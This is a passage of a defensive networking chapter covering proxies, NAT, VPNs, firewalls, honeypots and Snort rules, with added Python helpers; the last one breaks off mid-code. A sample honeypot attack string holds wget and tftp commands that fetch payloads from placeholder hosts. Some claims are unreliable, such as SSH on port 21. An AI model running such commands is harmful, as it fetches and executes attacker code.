An application-level proxy works as a proxy server and filters connections for specific services. It filters connections based on the services and protocols when acting as a proxy. For example, an FTP proxy will only allow FTP traffic to pass through, while all other services and protocols will be blocked. It is a type of server that acts as an interface between the user workstation and the Internet. It correlates with the gateway server and separates the enterprise network from the Internet. It receives the request from a user to provide the Internet service and responds to the original request only. A proxy service is an application or program that helps forward user requests (for example, FTP or Telnet) to the actual services. Proxies are also known as application-level gateways, as they renew the connections and act as a gateway to the services. Proxies run on a firewall host that is either a dual-homed host or some other bastion host for security purposes. Some proxies, named caching proxies, run for network efficiency. They keep copies of the requested data of the hosts they proxy. Such proxies can provide the data directly when multiple hosts request the same data. Caching proxies help in reducing the load on network connections, whereas proxy servers provide both security and caching.
A proxy service sits between the user on the internal network and the service on the outside network (Internet), and is transparent. Instead of communicating directly with each other, user and service talk with the proxy, which handles all the communication between users and the Internet services. Transparency is the advantage of proxy services. To the user, a proxy server presents the illusion that they are dealing directly with the real server, whereas to the real server the proxy gives the illusion that it is dealing directly with the user.
Advantages
■ Proxy services can be good at logging because they can understand application protocols and effectively allow logging.
■ Proxy services reduce the load on network links as they are capable of caching copies of frequently requested data and allow it to be directly loaded from the system instead of the network.
■ Proxy systems perform user-level authentication, as they are involved in the connection.
■ Proxy systems automatically protect weak or faulty IP implementations as it sits between the client and the internet and generates new IP packets for the client.
Disadvantages
■ Proxy services lag behind non-proxy services until the suitable proxy software is available.
■ Each service in a proxy may use different servers.
■ Proxy services may require changes in the client, applications, and procedures.
Network Address Translation (NAT)
Network address translation (NAT) separates IP addresses into two sets, enabling the LAN to use these addresses for internal and external traffic, respectively. NAT helps hide the internal network layout and forces connections to go through a choke point. It works with a router, as packet filtering does, but NAT also modifies the packets the router forwards. When an internal machine sends a packet to an outside machine, NAT modifies the source address of that packet to make it appear as if it is coming from a valid external address. When the external machine sends a packet to the internal machine, NAT modifies the destination address to turn the visible address back into the correct internal address. NAT can also change the source and destination port numbers. It limits the number of public IP addresses an organization needs. It can act as a firewall filtering technique by allowing only those connections that originate on the inside network and blocking connections that originate on the outside network. NAT systems use different schemes for translating between internal and external addresses:
■ Assigning one external host address for each internal address and always applying the same translation. This slows down connections and does not provide any savings in address space.
■ Dynamically allocate an external host address without modifying the port numbers at the time when the internal host initiates a connection. This restricts the number of internal hosts that can simultaneously access the Internet to the number of available external addresses.
■ Create a fixed mapping from internal addresses to externally visible addresses, but use a port mapping so that multiple internal machines use the same external addresses.
■ Dynamically allocate an external host address and port pair each time an internal host initiates a connection. This makes the most efficient possible use of the external host addresses.
Advantages
■ Network address translation helps to enforce the firewall's control over outbound connections.
■ It restricts incoming traffic and allows only packets that are part of a current interaction initiated from the inside.
■ Helps hide the internal network's configuration and thereby reduces the success of attacks on the network or system.
Disadvantages
■ The NAT system has to guess how long it should keep a particular translation, which is impossible to guess correctly every time.
■ NAT interferes with encryption and authentication systems that are meant to ensure the security of the data.
■ Dynamic allocation of ports may interfere with packet filtering.
Virtual Private Network
A Virtual Private Network (VPN) is a network that provides secure access to the private network through the internet. VPNs are used for connecting wide area networks (WAN). It allows computers on one network to connect to computers on another network. It is used for the secure transmission of sensitive information over an untrusted network, using encapsulation and encryption. It employs encryption and integrity protection helping you to use a public network as a private network. A VPN performs encryption and the decryption outside the packet-filtering perimeter to allow the inspection of packets coming from other sites. It establishes a virtual point-to-point connection through the use of dedicated connections. A VPN encapsulates packets sent over the Internet. A VPN is an attempt to combine both the advantages of public and private networks. VPNs have no relation to firewall technology, but firewalls are convenient for adding VPN features as they help in providing secure remote services. The computing device running the VPN software can only access the VPN.
All virtual private networks that run over the Internet employ these principles:
■ Encrypts the traffic
■ Checks for integrity protection
■ Encapsulates into new packets, which are sent across the Internet to something that reverses the encapsulation
■ Checks the integrity
■ Then finally, decrypts the traffic
Advantages
■ A VPN hides all the traffic that flows over it, ensures encryption, and protects the data from snooping.
■ It provides remote access for protocols without letting people attack from the Internet at large.
Disadvantages
■ As the VPN runs on a public network, the user will be vulnerable to an attack on the destination network.
Firewall Limitations
A firewall is an essential part of your security strategy, but firewalls have the following limitations:
■ Firewalls can restrict users from accessing valuable services like FTP, Telnet, NIS, etc. and sometimes restricts Internet access as well.
■ The firewall cannot protect from internal attacks (backdoor) in a network. For example, a disgruntled employee who cooperates with the external attacker.
■ The firewall concentrates its security at one single point which makes other systems within the network prone to security attacks.
■ A bottleneck could occur if all the connections pass through the firewall.
■ The firewall cannot protect the network from social engineering and data-driven attacks where the attacker sends malicious links and emails to employees inside the network.
■ If external devices such as a laptop, mobile phone, portable hard drive, etc. are already infected and connected to the network, then a firewall cannot protect the network from these devices.
■ The firewall is unable to adequately protect the network from all types of zero-day viruses that try to bypass it.
■ A firewall cannot do anything if the network design and configuration is faulty.
■ A firewall is not an alternative to antivirus or antimalware.
■ A firewall does not block attacks from a higher level of the protocol stack.
■ A firewall does not protect against attacks originating from common ports and applications.
■ A firewall does not protect against attacks from dial-in connections.
■ A firewall is unable to understand tunneled traffic.
Honeypot
A honeypot is a computer system on the Internet intended to attract and trap people who attempt unauthorized or illicit use of the host system to penetrate an organization's network. It is a fake proxy run in an attempt to frame attackers by logging traffic through it and then sending complaints to the victims' ISPs. It has no authorized activity and no production value, so any traffic to it is likely a probe, attack, or compromise. Whenever there is any interaction with a honeypot, it is most likely malicious activity. Honeypots are unique: they do not solve a specific problem; instead, they are a highly flexible tool with many different security applications. Honeypots help in preventing attacks, detecting attacks, and gathering information for research. A honeypot can log port access attempts or monitor an attacker's keystrokes, which could be early warnings of a more concerted attack. Maintaining a honeypot requires a considerable amount of attention.
Types of Honeypots
Honeypots are classified into five types based on their design criteria:
■ Low-interaction Honeypots
A low-interaction honeypot emulates only a limited number of services and applications of a target system or network. If the attacker does something that the emulation does not expect, the honeypot will simply generate an error. These honeypots capture limited amounts of information, mainly transactional data and some limited interaction. They cannot be compromised completely. They are set up to collect higher-level information about attack vectors such as network probes and worm activities. Some examples are Specter, KFSensor, and Honeytrap.
KFSensor is a low-interaction honeypot used to attract and identify penetrations. It implements vulnerable system services and Trojans to attract hackers. This honeypot can be used to monitor all TCP, UDP, and ICMP ports and services. KFSensor identifies and alerts about port scanning and denial-of-service attacks.
Honeytrap is a low-interaction honeypot used to observe attacks against TCP and UDP services. It runs as a daemon and starts server processes dynamically on requested ports. Attackers are tricked into sending their traffic to the honeytrap server process. The data received by the honeypot is concatenated into a string and stored in a database file. This string is called the attack string. Honeytrap parses attack strings for a command requesting the server to download a file from another host in the network. If such a command is detected, the server tries to access the corresponding file automatically. It supports only the FTP and TFTP protocols. It also identifies and logs HTTP URIs.
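Honeytrap's attack-string handling, as described above, can be illustrated with a small parser. The following is an added example written for this page, not honeytrap's own code: it scans a captured attack string for the download commands the text mentions (wget, curl, tftp, ftp) and returns them as indicators for logging and review, rather than fetching anything. The attack string, the host addresses and the file names are constructed samples.

```python
"""Extract download indicators from a honeypot attack string (added example)."""
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# A download command and the rest of its shell word run, up to a command separator.
DOWNLOAD_CMD = re.compile(r"\b(wget|curl|tftp|ftp)\b[^;&|\r\n]*", re.IGNORECASE)
# A URL in one of the schemes the command line tools above accept.
URL = re.compile(r"\b(?:https?|ftp|tftp)://[^\s'\";|&]+", re.IGNORECASE)
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")

# Constructed sample: everything one attacker session sent, concatenated the way
# honeytrap stores it. Addresses are documentation-range placeholders.
SAMPLE_ATTACK_STRING = (
    "USER anonymous\r\nPASS guest\r\n"
    "cd /tmp; wget http://198.51.100.7/update.sh -O u.sh\r\n"
    "tftp -i 198.51.100.9 GET payload.bin\r\n"
    "QUIT\r\n"
)


def extract_download_indicators(attack_string: str) -> List[Dict[str, Optional[str]]]:
    """Return one indicator per download command found in the attack string."""
    indicators: List[Dict[str, Optional[str]]] = []
    for m in DOWNLOAD_CMD.finditer(attack_string):
        segment = m.group(0).strip()
        tool = m.group(1).lower()
        url = URL.search(segment)
        if url:
            # URL form: wget/curl/ftp with an explicit scheme and host.
            u = urlparse(url.group(0))
            indicators.append({"tool": tool, "scheme": u.scheme.lower(),
                               "host": u.hostname, "path": u.path, "command": segment})
            continue
        # Client form: tftp/ftp name the host and file without a URL.
        host = IPV4.search(segment)
        fname = re.search(r"\b(?:get|put)\s+(\S+)", segment, re.IGNORECASE)
        if host:
            indicators.append({"tool": tool, "scheme": tool, "host": host.group(0),
                               "path": fname.group(1) if fname else None, "command": segment})
    return indicators


def hosts_to_watch(indicators: List[Dict[str, Optional[str]]]) -> List[str]:
    """Distinct hosts the attacker tried to fetch from, for blocklists or alert context."""
    return sorted({i["host"] for i in indicators if i["host"]})


if __name__ == "__main__":
    for ind in extract_download_indicators(SAMPLE_ATTACK_STRING):
        print(ind)
    print("hosts:", hosts_to_watch(extract_download_indicators(SAMPLE_ATTACK_STRING)))
```

The parser stops each command at `;`, `&`, `|` or a line ending, so a chained shell line yields one indicator per download command. Honeytrap itself goes a step further and retrieves the referenced file over FTP or TFTP; this example only records what was requested, which is the part a defender needs for alerting.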
■ Medium-interaction Honeypots
Medium-interaction honeypots simulate a real OS, its applications, and the services of a target network. They present a more convincing illusion of an OS than low-interaction honeypots do, so it is possible to log and analyze attacks that are more complex. These honeypots capture more, and more useful, data than low-interaction honeypots. Medium-interaction honeypots can only respond to preconfigured commands; therefore, the risk of intrusion increases. The main disadvantage of a medium-interaction honeypot is that the attacker can quickly discover that the system behavior is abnormal. Some examples of medium-interaction honeypots include HoneyPy, Kojoney2, and Cowrie.
Kojoney2 is a medium-interaction honeypot. It emulates a real SSH environment. This honeypot listens on port 21 for incoming SSH connections. If a connection request is initiated, Kojoney2 will verify users against an internal list of fake users. Mostly, the connections are accepted by granting access to an SSH shell. It simulates many shell commands to trick attackers. With Kojoney2, attackers can download files using the wget and curl commands.
■ High-Interaction Honeypots
Unlike their low and medium interaction counterparts, high-interaction honeypots do not emulate anything; they run actual vulnerable services or software on production systems with real OSs and applications. These honeypots simulate all services and applications. It can be completely compromised by attackers to get full access to the system in a controlled area. They capture complete information about an attack vector such as attack techniques, tools, and intent of the attack. The honeypotized system is more prone to infection, as attack attempts can be carried out on real production systems.
A honeynet is a prime example of a high-interaction honeypot and is neither a product nor a software solution that a user installs. Instead, it is an architecture—an entire network of computers designed to be attacked. The idea is to have an architecture that creates a highly controlled network with real computers running real applications, in which all activities are monitored and logged.
"Bad guys" find, attack, and break into these systems on their own initiative. When they do, they do not realize they are in a honeynet. Without the attackers' knowledge, all their activities and actions, from encrypted SSH sessions to email and file uploads, are captured by inserting kernel modules on the victim systems.
At the same time, the honeynet controls the attacker's activity. Honeynets do this by using a honeywall gateway, which allows inbound traffic to the victim's systems but controls the outbound traffic using intrusion prevention technologies. This gives the attacker the flexibility to interact with the victim's systems, but prevents the attacker from harming other non-honeynet computers.
■ Production Honeypots
Production honeypots emulate the real production network of an organization. They make attackers spend their time and resources attacking the emulated critical production system of the company. Attackers uncover and discover the vulnerabilities and trigger alerts that give network administrators early warning of attacks and hence reduce the risk of an intrusion.
This type of honeypot can also emulate different trojans, viruses, and backdoors to attract attackers. For example, to examine attacks on an intrusion detection system, a production honeypot emulating an IDS with fake services is deployed. As a production honeypot is deployed internally, it also helps to find internal flaws and attackers within an organization.
■ Research Honeypots
Research honeypots are high interaction honeypots primarily deployed in research institutes, government or military organizations to get a detailed knowledge about the actions of intruders. By using this type of honeypots security analysts can obtain in-depth information about the way an attack is performed, vulnerabilities exploited and the attack techniques and methods used by the attackers. This analysis, in turn, can help an organization to improve attack prevention, detection, and security mechanisms and develop more secure network infrastructure.
The drawback of research honeypots is that they do not contribute to the direct security of the company. A company looking to improve its production infrastructure should therefore opt for production honeypots instead.
IDS, Firewall and Honeypot Solutions
The previous section discussed the functioning, role, and placement of IDS, firewalls, and honeypots for securing networks. There are a number of easy-to-use, feature-rich solutions (hardware, software, or both) available for implementing IDS, firewalls, and honeypots. This section discusses some of the IDS, firewall, and honeypot solutions available in the market that simplify their usage.
Intrusion Detection Tools
Intrusion detection tools detect anomalies. These tools, when running on a dedicated workstation, read all network packets, reconstruct user sessions, and scan for possible intrusions by looking for attack signatures and network traffic statistical anomalies. Also, these tools give real-time, zero-day protection from network attacks and malicious traffic, and prevent malware, spyware, port scans, viruses, and DoS and DDoS from compromising hosts.
■ Snort
Source: https://www.snort.org
Snort is an open source network intrusion detection system, capable of performing real time traffic analysis and packet logging on IP networks. It can perform protocol analysis and content searching/matching and is used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, and OS fingerprinting attempts. It uses a flexible rules language to describe traffic that it should collect or pass, as well as a detection engine that utilizes a modular plug-in architecture. Uses of Snort:
o Straight packet sniffer like tcpdump
o Packet logger (useful for network traffic debugging, etc.)
o Network intrusion prevention system
Snort Rules
Snort's rule engine enables custom rules to meet the needs of the network. Snort rules help in differentiating between normal Internet activities and malicious activities. Snort uses the popular libpcap library (for UNIX/Linux) or Winpcap (for Windows), the same library that tcpdump uses to perform its packet sniffing. Attaching snort in promiscuous mode to the network media decodes all the packets passing through the network. It generates alerts according to the content of individual packets and rules defined in the configuration file.
Snort allows users to write their own rules. However, each of these Snort rules must describe the following:
■ Any violation of the security policy of the company that might be a threat to the security of the company's network and other valuable information
■ All well-known and frequent attempts to exploit the vulnerabilities in the company's network
■ The conditions in which a user thinks that a network packet(s) is unusual (i.e., if the identity of the packet is not authentic)
Snort rules, written for both protocol analysis and content searching and matching, should be robust and flexible. The rules should be "robust": the system should keep a hard check on the activities taking place on the network and notify the administrator of any potential intrusion attempt. The rules should be "flexible": the system must be compatible enough to act immediately and take the necessary remedial measures, according to the nature of the intrusion.
Both flexibility and robustness can be achieved using an easy-to-understand and lightweight rule description language that aids in writing simple Snort rules. Consider two primary principles while writing Snort rules:
■ No written rule must extend beyond a single line, so rules should be short, precise, and easy-to-understand.
■ Each rule should be divided into two logical sections:
o The rule header
o The rule options
The rule header contains the rule's action, the protocol, the source and destination IP addresses, the source and destination port information, and the CIDR (Classless Inter-Domain Routing) block. The rule option section includes alert messages, in addition to information about inspected part of the packet, to determine whether to take rule action.
Snort Rules: Rule Actions and IP Protocols
The rule header stores the complete set of criteria used to identify a packet and determines the action to be performed, or which rule applies. It contains information that defines the who, where, and what of a packet, as well as what to do if a packet with all the attributes indicated in the rule should show up. The first item in a rule is the rule action, which tells Snort "what to do" when it finds a packet that matches the rule criteria. There are five available default actions in Snort: alert, log, pass, activate, and dynamic. Also, if Snort is running in inline mode, you have additional options, which include drop and reject.
IP supports unique addressing for every computer on a network. Data on an Internet Protocol network is organized into packets; each packet contains message data, source, destination, and more.
Three available IP protocols that Snort supports for suspicious behavior:
■ TCP: Transmission control protocol (TCP) is a part of the Internet Protocol. It is used to connect two different hosts and exchanges data between them.
■ UDP: User Datagram Protocol (UDP) is used for broadcasting messages over a network.
■ ICMP: The Internet Control Message Protocol (ICMP) is a part of the Internet Protocol. OSs use ICMP in a network to send error messages, for example.
Snort Rules: The Direction Operator and IP Addresses
■ The Direction Operator
This operator indicates the direction of interest for the traffic; traffic can flow in either single direction or bi-directionally.
Example of a Snort rule using the Bidirectional Operator: log !192.168.1.0/24 any <> 192.168.1.0/24 23
■ IP Addresses
o Identifies the IP address and port that the rule applies to
o Use the keyword "any" to match any IP address
o Use numeric IP addresses qualified with a CIDR netmask
o Example IP Address Negation Rule:
Snort Rules: Port Numbers
Port numbers can be listed in different ways, including "any" ports, static port definitions, port ranges, and by negation. Port ranges are indicated by the range operator ":". The direction operator "->" indicates the orientation, or direction, of the traffic to which the rule applies. Consider the IP address and port number on the left side of the direction operator as the traffic coming from the source host, and the address and port information on the right side of the operator as the destination host. There is also a bidirectional operator, indicated with "<>". This tells Snort to consider the address/port pairs in either the source or the destination orientation and is handy for recording/analyzing both sides of a conversation, such as telnet or POP3 sessions. Also, note that there is no "<-" operator. In Snort versions before 1.8.7, the direction operator did not have proper error checking, so many people used an invalid token. The reason the "<-" operator does not exist is so that rules always read consistently.
The next fields in a Snort rule specify the source and destination IP addresses and ports of the packet, as well as the direction in which the packet is traveling. Snort can accept a single IP address or a list of addresses. When specifying a list of IP address, you should separate each one with a comma and then enclose the list within square brackets, like this:
[192.168.1.1,192.168.1.45,10.1.1.24]
When doing this, be careful not to use any whitespace. You can also specify ranges of IP addresses using CIDR notation, or even include CIDR ranges within lists. Snort also allows you to apply the logical NOT operator ("!") to an IP address or CIDR range to specify that the rule should match all but that address or range of addresses. For example, an easy modification to the initial example is to make it alert on any traffic that originates outside of the local net by using the negation operator. Example of a Port Negation:
log tcp any any -> 192.168.1.0/24 !6000:6010
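The rule-header grammar described in the preceding sections (actions, protocols, the "->" and "<>" direction operators, address lists with CIDR and "!" negation, and port ranges with negation) can be exercised with a small parser and matcher. The following is an added example written for this page; it is not Snort's own code, it handles only the header plus a flat list of options, and its first-match evaluation order is a simplification rather than Snort's real ordering. The packets and the msg/sid option values are constructed for illustration. Note that the bidirectional example above omits the protocol field, which a real Snort rule requires, so the usage here supplies tcp.

```python
"""Snort-style rule header parser and matcher (added example; not Snort's own code)."""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# action, protocol, source address/port, direction, destination address/port, optional (options)
RULE_HEADER = re.compile(
    r"^\s*(?P<action>alert|log|pass|activate|dynamic|drop|reject)\s+"
    r"(?P<proto>tcp|udp|icmp|ip)\s+"
    r"(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>->|<>)\s+"
    r"(?P<dst>\S+)\s+(?P<dport>\S+)"
    r"\s*(?:\((?P<opts>.*)\))?\s*$"
)


@dataclass(frozen=True)
class Packet:
    proto: str
    src: str
    dst: str
    sport: Optional[int] = None  # None for ICMP, which has no ports
    dport: Optional[int] = None


def _split_list(spec: str) -> List[str]:
    """'[a,b,c]' -> ['a', 'b', 'c']; anything else is a single item (no whitespace allowed)."""
    if spec.startswith("[") and spec.endswith("]"):
        return spec[1:-1].split(",")
    return [spec]


def parse_addr(spec: str):
    """'any', an IP, a CIDR block or a bracketed list, optionally prefixed with '!'."""
    negated = spec.startswith("!")
    if negated:
        spec = spec[1:]
    if spec == "any":
        return negated, None
    return negated, [ipaddress.ip_network(item, strict=False) for item in _split_list(spec)]


def parse_port(spec: str):
    """'any', a port, a range 'lo:hi' (either end may be open) or a list, optionally negated."""
    negated = spec.startswith("!")
    if negated:
        spec = spec[1:]
    if spec == "any":
        return negated, None
    ranges: List[Tuple[int, int]] = []
    for item in _split_list(spec):
        if ":" in item:
            lo, hi = item.split(":", 1)
            ranges.append((int(lo) if lo else 0, int(hi) if hi else 65535))
        else:
            ranges.append((int(item), int(item)))
    return negated, ranges


def is_valid_rule(text: str) -> bool:
    return RULE_HEADER.match(text) is not None


def parse_rule(text: str) -> Dict:
    m = RULE_HEADER.match(text)
    if not m:
        raise ValueError(f"not a valid rule header: {text!r}")
    opts: Dict[str, str] = {}
    for item in (m.group("opts") or "").split(";"):  # simplistic: no ';' inside quoted values
        item = item.strip()
        if item:
            key, _, value = item.partition(":")
            opts[key.strip()] = value.strip().strip('"')
    return {
        "action": m.group("action"), "proto": m.group("proto"), "dir": m.group("dir"),
        "src": parse_addr(m.group("src")), "sport": parse_port(m.group("sport")),
        "dst": parse_addr(m.group("dst")), "dport": parse_port(m.group("dport")),
        "opts": opts,
    }


def _addr_hit(spec, ip: str) -> bool:
    negated, nets = spec
    hit = True if nets is None else any(ipaddress.ip_address(ip) in n for n in nets)
    return hit != negated


def _port_hit(spec, port: Optional[int]) -> bool:
    negated, ranges = spec
    if ranges is None:
        hit = True
    elif port is None:
        hit = False  # a portless protocol cannot satisfy an explicit port spec
    else:
        hit = any(lo <= port <= hi for lo, hi in ranges)
    return hit != negated


def matches(rule: Dict, pkt: Packet) -> bool:
    if rule["proto"] != "ip" and rule["proto"] != pkt.proto:
        return False
    forward = (_addr_hit(rule["src"], pkt.src) and _port_hit(rule["sport"], pkt.sport)
               and _addr_hit(rule["dst"], pkt.dst) and _port_hit(rule["dport"], pkt.dport))
    if forward or rule["dir"] == "->":
        return forward
    # '<>': also test the packet with source and destination swapped
    return (_addr_hit(rule["src"], pkt.dst) and _port_hit(rule["sport"], pkt.dport)
            and _addr_hit(rule["dst"], pkt.src) and _port_hit(rule["dport"], pkt.sport))


def evaluate(rules: List[Dict], pkt: Packet) -> Optional[Tuple[str, str]]:
    """Return (action, msg) of the first matching rule; Snort's real ordering differs."""
    for rule in rules:
        if matches(rule, pkt):
            return rule["action"], rule["opts"].get("msg", "")
    return None
```

Running the page's port-negation rule through `matches` shows why "!6000:6010" is useful: a packet to port 6005 is left alone while one to 6011 is logged. The bidirectional rule matches the telnet session in both directions, and the `is_valid_rule` check rejects the header that lacks a protocol field.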
■ TippingPoint
Source: https://tmc.tippingpoint.com
TippingPoint IPS is in-line threat protection that defends critical data and applications without affecting performance and productivity. It contains over 8,700 security filters written to address zero-day and known vulnerabilities. TippingPoint IPS consists of both inbound/outbound traffic inspection, as well as application-level security capabilities.
Features:
o Pre-built, real-time reports that display big-picture analyses on traffic, top applications, and filtered attack events
o Permits to see, control, and leverage the rules, shared services, and profiles of all the firewall devices throughout the network
o Comprises an in-line, bump-in-the-wire intrusion prevention system with layer-two fallback capabilities
o Gives an overview of current performance for all HP systems in the network, including launch capabilities into targeted management applications by using monitors
o Delivers fully customizable dashboard and management console
o Offers up to 20 GB of protection with less than 40 microseconds of network latency
■ AlienVault® OSSIM™
Source: https://www.alienvault.co
AlienVault® OSSIM™, Open Source Security Information and Event Management (SIEM), provides you with a feature-rich open source SIEM complete with event collection, normalization, and correlation. OSSIM provides one unified platform with many of the essential security capabilities like:
o Asset discovery
o Vulnerability assessment
o Intrusion detection
o Behavioral monitoring
o SIEM event correlation
Listed below are some of the additional intrusion detection tools:
■ Check Point IPS Software Blade (https://www.checkpoint.com)
■ IBM Security Network Intrusion Prevention System (https://www.ibm.com)
■ AlienVault Unified Security Management (https://www.alienvault.com)
■ Cyberoam Intrusion Prevention System (https://www.cyberoam.com)
■ McAfee Host Intrusion Prevention for Desktops (https://www.mcafee.com)
■ Next-Generation Intrusion Prevention System (NGIPS) (https://www.cisco.com)
■ FortiGate IPS (https://www.fortinet.com)
■ Next Generation Threat Prevention (https://www.checkpoint.com)
■ Suricata (https://suricata-ids.org)
■ Snare (https://www.intersectalliance.com)
■ OSSEC (https://ossec.github.io)
■ Cisco Intrusion Prevention Systems (https://www.cisco.com)
■ AIDE (Advanced Intrusion Detection Environment) (http://aide.sourceforge.net)
■ Vanguard Enforcer (https://www.go2vanguard.com)
■ INTOUCH INSA-Network Security Agent (http://www.ttinet.com)
■ Fragroute (https://www.monkey.org)
■ Peek & Spy (http://networkingdynamics.com)
■ IDP8200 Intrusion Detection and Prevention Appliances (https://www.juniper.net)
Intrusion Detection Tools for Mobile
There are also Intrusion detection tools available for mobile devices that can help you detect and prevent any attempt of intrusion.
■ ZIPS
Source: https://www.zimperium.com
Zimperium's ZIPS is a mobile intrusion prevention system app that provides comprehensive protection for iOS and Android devices against mobile network, device and application cyber attacks. It can detect both known and unknown threats by analyzing the behavior of your mobile device. By examining slight deviations in the mobile device's OS statistics, memory, CPU and other system parameters, the z9 detection engine can accurately identify not only the specific type of malicious attack, but also the forensics associated with the who, what, where, when, and how of an attack occurrence.
■ Wifi Inspector
Source: https://play.google.com
Wifi Inspector allows you to find all the devices connected to the network (both wired and Wi-Fi, whether consoles, TVs, pcs, tablets, phones, etc.), giving relevant data such as IP address, manufacturer, device name and Mac Address. It also allows saving a list of known devices with custom name and finds intruders in a short period.
■ Wifi Intruder Detector pro
Source: https://play.google.com
Wifi Intruder Detector pro helps to find security leaks in the Wi-Fi network Internet connection. It allows you to detect an intruder who is accessing the network, Wi-Fi, or Internet connection without your consent.
Firewalls
Firewalls provide essential protection to computers against viruses, privacy threats, objectionable content, hackers, and malicious software when they are connected to the Internet. A firewall monitors running applications that access the network. It analyzes downloads, warns if a malicious file is being downloaded, and stops it from infecting the PC.
■ ZoneAlarm PRO FIREWALL 2018
Source: https://www.zonealarm.com
ZoneAlarm PRO Firewall blocks attackers and intruders from accessing your system. It monitors programs for suspicious behavior, spotting and stopping new attacks that bypass traditional anti-virus protection. It prevents identity theft by guarding your data. It even erases your tracks, allowing you to surf the web in complete privacy. Furthermore, it locks out attackers, blocks intrusions, and makes your PC invisible online. Also, it filters out annoying and potentially dangerous email.
Features:
o Two-way firewall that monitors and blocks inbound as well as outbound traffic
o Allows users to browse the web privately
o Identity protection services help to prevent identity theft by guarding crucial data of the users. It also offers PC protection and data encryption
o Through Do Not Track, it stops data-collecting companies from tracking online users
o Online Backup backs up files and restores the data in the event of loss, theft, accidental deletion or disk failure
■ Firewall Analyzer
Source: https://www.manageengine.com
Firewall Analyzer is agent-less log analytics and configuration management software that helps network administrators understand how bandwidth is being used in their network. Firewall Analyzer is vendor-agnostic and supports almost all open source and commercial network firewalls such as Check Point, Cisco, Juniper, Fortinet, Palo Alto, etc.
Features:
o Compliance Management
o Change Management
o User Internet Activity Monitoring
o Network Traffic and Bandwidth Monitoring
o Firewall Policy Management
o Real-time VPN and Proxy Server Monitoring
o Network Security Management
o Network Forensic Audits
o Log Analysis
■ Comodo Firewall (https://personalfirewall.comodo.com)
■ Sophos XG Firewall (https://www.sophos.com)
■ Check Point Firewall Software Blade (https://www.checkpoint.com)
■ eScan Enterprise Edition (https://www.escanav.com)
■ Untangle NG Firewall (https://www.untangle.com)
■ Glasswire (https://www.glasswire.com)
■ Zscaler Cloud Firewall (https://www.zscaler.com)
■ TinyWall (https://tinywall.pados.hu)
■ Cisco ASA (https://www.cisco.com)
■ Meraki Cisco Firewall (https://meraki.cisco.com)
■ Sonicwall NEXT GENERATION FIREWALLS (https://www.sonicwall.com)
■ FortiGate Next-Generation Firewall (https://www.fortinet.com)
■ Jetico Personal Firewall (http://www.jetico.com)
■ Palo Alto Network Wildfire (https://www.paloaltonetworks.com)
■ PeerBlock (http://forums.peerblock.com)
Firewalls for Mobile
The firewalls discussed previously are used for securing personal computers and networks. Likewise, some firewalls can secure mobile devices.
■ Mobiwol: No Root Firewall
Source: http://www.mobiwol.com
Mobiwol No Root Firewall helps in taking control of mobile apps, easily allow/block app connectivity, and block background app activity. It generates alerts when new apps access the Internet.
Features:
o Automatic launch on device startup
o Automatically identifies applications currently installed on your mobile device
o Identifies and notifies when newly installed apps access the Web
o Set Allow/Block, on a per-application basis
o Disable background activity for selected apps
■ Mobile Privacy Shield
Source: https://shieldapps.com
Mobile Privacy Shield is an application for people on the move: people who store necessary information on their smartphones and use their devices for banking, shopping, business, and more. Mobile Privacy Shield's Privacy Advisor monitors application permissions, sorting them into three categories by privacy-risk level. Each report is packed with detailed information and a suggested response per case. Mobile Privacy Shield centralizes all permissions, allowing you to conveniently review and assess their validity and need. It also allows you to remove each threat from within the interface.
■ Net Patch Firewall
Source: https://firewall.netpatch.co
NetPatch Firewall is a full-featured advanced Android no-root firewall. It can be used to take full control over the mobile device's network. With NetPatch Firewall, you can create network rules based on app, IP address, domain name, etc. This firewall is designed to save the mobile device's network traffic and battery consumption, improve network security and protect privacy.
Features:
o Block network access per app, based on screen on/off, wifi/mobile (3G & 4G), and block Roaming
o Shadowsocks secure proxy, support TCP and UDP (one better VPN proxy)
o Custom DNS, change your DNS servers, support DNS query through Shadowsocks proxy, and set DNS cache time
o Notify when new apps installed
o Export/import configure
Listed below are some of the additional firewalls for mobile devices:
■ Firewall Gold (https://play.google.com)
■ AFWall+ (https://github.com)
■ DroidWall - Android Firewall (https://play.google.com)
■ aFirewall (https://afirewall.wordpress.com)
■ Root Firewall (http://www.rootuninstaller.com)
■ NoRoot Firewall (https://play.google.com)
■ NoRoot Data Firewall (https://play.google.com)
■ Kronos Firewall (https://play.google.com)
■ VPN Safe Firewall (https://play.google.com)
■ Privacy Firewall (https://play.google.com)
■ NetGuard (https://www.netguard.me)
■ Bluetooth Firewall (https://play.google.com)
■ CIA Firewall (https://play.google.com)
■ Ultra Firewall (https://play.google.com)
■ Firewall iP (http://cydia.saurik.com)
Honeypot Tools
Honeypots are security tools that give the security community an opportunity to monitor attackers' tricks and exploits by logging their every activity, so that defenders can respond to these exploits quickly before attackers misuse and compromise production systems.
■ KFSensor
Source: http://www.keyfocus.net
KFSensor is a host-based Intrusion Detection System (IDS) that acts as a honeypot to attract and detect hackers and worms by simulating vulnerable system services and Trojans. By acting as a decoy server, it can divert attacks from critical systems and provide a higher level of information than can be achieved by using firewalls and NIDS alone.
KFSensor is designed for Windows-based corporate environments and contains many innovative and unique features, such as remote management, a Snort-compatible signature engine, and emulations of Windows networking protocols.
Features:
o Signature attack identification
o Detects Windows networking attacks
o Remote Administration
o Identifies unknown threats
o Security in-depth
o Real-time detection
o Advanced server simulation
o Extendable architecture
o No false positives and low overhead
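The honeypot concept described above (a decoy service that logs every connection so defenders can study and respond to probes) and the KFSensor-style combination of service simulation with a signature engine can be shown in a few dozen lines. The following is an added example written for this module; it is not code from KFSensor, SPECTER, or any other product listed here. It binds a minimal low-interaction TCP decoy on localhost that presents a constructed SMTP-looking banner, records the first bytes each client sends as one JSON log line, and labels the session with a tiny constructed signature table. The hostname in the banner, the signature prefixes, and the `demo()` probes are all assumptions for illustration.

```python
"""Minimal low-interaction TCP honeypot (added example, not KFSensor/SPECTER code)."""
import json
import socket
import threading
import time

# Constructed decoy banner: looks like an SMTP server but implements no mail logic.
DECOY_BANNER = b"220 mail.example.test ESMTP ready\r\n"

# Constructed signature table: opening bytes of a session -> what the client appears to be doing.
SIGNATURES = (
    (b"EHLO", "smtp-handshake"),
    (b"HELO", "smtp-handshake"),
    (b"GET ", "http-probe"),
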